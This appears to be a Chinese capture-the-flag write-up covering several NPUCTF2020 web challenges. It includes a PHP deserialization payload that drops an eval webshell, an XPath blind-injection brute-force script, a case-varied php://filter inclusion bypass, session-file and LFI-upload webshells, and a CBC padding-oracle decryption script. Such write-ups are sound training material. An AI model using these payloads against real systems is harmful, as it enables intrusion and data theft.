查源码
F12不说了
RealEzPHP
反序列化入门
<?php
#error_reporting(0);
class HelloPhp {
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp('"ls"','system');
echo serialize($c);
直接给变量ab赋值,禁用了system没禁用assert,写个一句话木马
<?php
class HelloPhp
{
public $a='eval("file_put_contents(\'1.php\', base64_decode(\'PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==\'));")';
public $b='assert';
}
$a=new HelloPhp();
然后蚁剑连接bypass就行了
ezlogin
考点:
··· xpath盲注
解题:
题目给了hint
‘了解XPath盲注’
帖子:https://www.tr0y.wang/2019/05/11/XPath%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/
判断用户名长度:' or string-length(/root/accounts/user[2]/username/text())=5 or '1
判断密码长度:' or string-length(/root/accounts/user[2]/password/text())=8 or '1
盲注:'or substring(/root/accounts/user[2]/username/text(),{},1)='{}' or '1
import requests
import re
r = requests.session()
s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
headers = {'Content-Type':'application/xml'}
username=''
for i in range(1,50):
for j in s:
url='http://2c41c44f-6b06-4399-82bd-72eb3e7febb2.node3.buuoj.cn/'
token=re.search('<input id="token" type="hidden" value="(.*)" />',r.get(url).text)[1]
#payload="' or substring(/root/accounts/user[2]/username/text(), "+str(i)+", 1)='"+j+"' or '112"+token+""
payload="' or substring(/root/accounts/user[2]/password/text(), "+str(i)+", 1)='"+j+"' or '112"+token+""
result=r.post(url=url,headers=headers,data=payload).text
if '非法操作' in result:
username+=j
print(username)
break
返回禁止就是True,返回错误就是False
难顶的是这题还有个token,每次登陆都会刷新,有师傅写个脚本模拟刷新正则匹配token然后放在payload里交了(ttttql)
跑出来用户名是adm1n,密码是gtfly123
登陆
文件包含,文件包含这里有过滤,使用伪协议会返回nonono,也不能文件穿越
感觉gugugu都翻烂了都没思路
后来经过队里师傅提醒,大小写绕过
phP://Filter/Read=convert.Base64-encode/resource=/flag
超简单的PHP!!!超简单!!!
一个phpinfo,一个留言板界面,有文件包含,伪协议读一下源码
msg.php
<?php
header('content-type:application/json');
session_start();
function safe($msg){
if (strlen($msg)>17){
return "msg is too loooong!";
} else {
return preg_replace("/php/","?",$msg);
}
}
if (!isset($_SESSION['msg'])&empty($_SESSION['msg']))$_SESSION['msg'] = array();
if (isset($_POST['msg']))
{
array_push($_SESSION['msg'], ['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]);
echo json_encode(array(['msg'=>safe($_POST['msg']),'time'=>date('Y-m-d H:i:s',time())]));
exit();
}
if(!empty($_SESSION['msg'])){
echo json_encode($_SESSION['msg']);
} else {echo "è¿ä¸å¿«å»çè¨ï¼";}
留言内容会写入session。然后不能出现php。
由于存在文件包含。通过留言板写一句话木马。然后包含sess
<?PHP /* */eval($_POST/* */[1]);//
有bypass,蚁剑一把梭
ezinclude
hash扩展长度攻击(有非预期)
源码是:
传入user=admin&pass=973225ae4fc8977f86d1a330b0774630
这里出题人写错了,应该预期解是用hashpump爆破出秘钥长度伪造
跳转到flflflflag.php,发现快速跳转到了404
抓包看一下
明显的文件包含了,伪协议读一下源码
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
很明显过滤了data,input,所以不能通过常规伪协议getshell
百度后发现下面的文章LFI via SegmentFault 发现和我们的很相似,改一下脚本拿来用
import requests
import string
import itertools
charset = string.digits + string.letters
base_url = "http://ha1cyon-ctf.fun:30189/flflflflag.php"
def upload_file_to_include(url, file_content):
files = {'file': ('evil.jpg', file_content, 'image/jpeg')}
try:
response = requests.post(url, files=files)
except Exception as e:
print e
def generate_tmp_files():
webshell_content = '<!--?php eval($_REQUEST[c]);?-->'.encode(
"base64").strip()
file_content = '<!--?php if(file_put_contents("/tmp/ssh_session_HD89q2", base64_decode("%s")))?-->' % (
webshell_content)
phpinfo_url = "%s?file=php://filter/string.strip_tags/resource=/etc/passwd" % (
base_url)
length = 6
times = len(charset) ** (length / 2)
for i in xrange(5):
print "[+] %d / %d" % (i, times)
upload_file_to_include(phpinfo_url, file_content)
def main():
generate_tmp_files()
if __name__ == "__main__":
main()
因为原文需要爆破文件名,而本题减小了难度,扫描发现dir.php
然后蚁剑包含刚上传的文件getshell,bypass一下就获得flag了
web🐕
CBC攻击的题,套娃
打开靶机给了源码
<?php
error_reporting(0);
include('config.php'); # $key,$flag
define("METHOD", "aes-128-cbc"); //定义加密方式
define("SECRET_KEY", $key); //定义密钥
define("IV","6666666666666666"); //定义初始向量 16个6
define("BR",'
');
if(!isset($_GET['source']))header('location:./index.php?source=1');
#var_dump($GLOBALS); //听说你想看这个?
function aes_encrypt($iv,$data)
{
echo "--------encrypt---------".BR;
echo 'IV:'.$iv.BR;
return base64_encode(openssl_encrypt($data, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)).BR;
}
function aes_decrypt($iv,$data)
{
return openssl_decrypt(base64_decode($data),METHOD,SECRET_KEY,OPENSSL_RAW_DATA,$iv) or die('False');
}
if($_GET['method']=='encrypt')
{
$iv = IV;
$data = $flag;
echo aes_encrypt($iv,$data);
} else if($_GET['method']=="decrypt")
{
$iv = @$_POST['iv'];
$data = @$_POST['data'];
echo aes_decrypt($iv,$data);
}
echo "我摊牌了,就是懒得写前端".BR;
if($_GET['source']==1)highlight_file(__FILE__);
百度发现了这个分组密码CBC加密缺陷 脚本拿来改一改
import requests
import base64
url = 'http://b485146f-0914-4063-bb7d-a9319fa0af83.node3.buuoj.cn/index.php?source=1&method=decrypt'
N = 16
l = [0] * N
iv = '6666666666666666'
tmp_iv = ''
out = [0] * N
s = ''
for i in range(1, N+1):
for c in range(0,256):
l[N-i] = c
tmp_iv = ''
for m in l:
tmp_iv += chr(m)
data = {"data":"ly7auKVQCZWum/W/4osuPA==", "iv":""}
data["iv"] = tmp_iv
#print payload
data = requests.post(url,data=data)
if '1' not in data:
out[N-i] = c ^ i
for y in range(i):
l[N-y-1] = out[N-y-1] ^ (i+1)
break
for i in range(N):
out[i] = out[i] ^ ord(iv[i])
for c in out:
s += chr(c)
print s
然后会打印出如下字符
FlagIsHere.php
进入第二关
https://www.jianshu.com/p/7f171477a603
参考这个脚本改改
[…] NPUCTF2020 部分WEB […]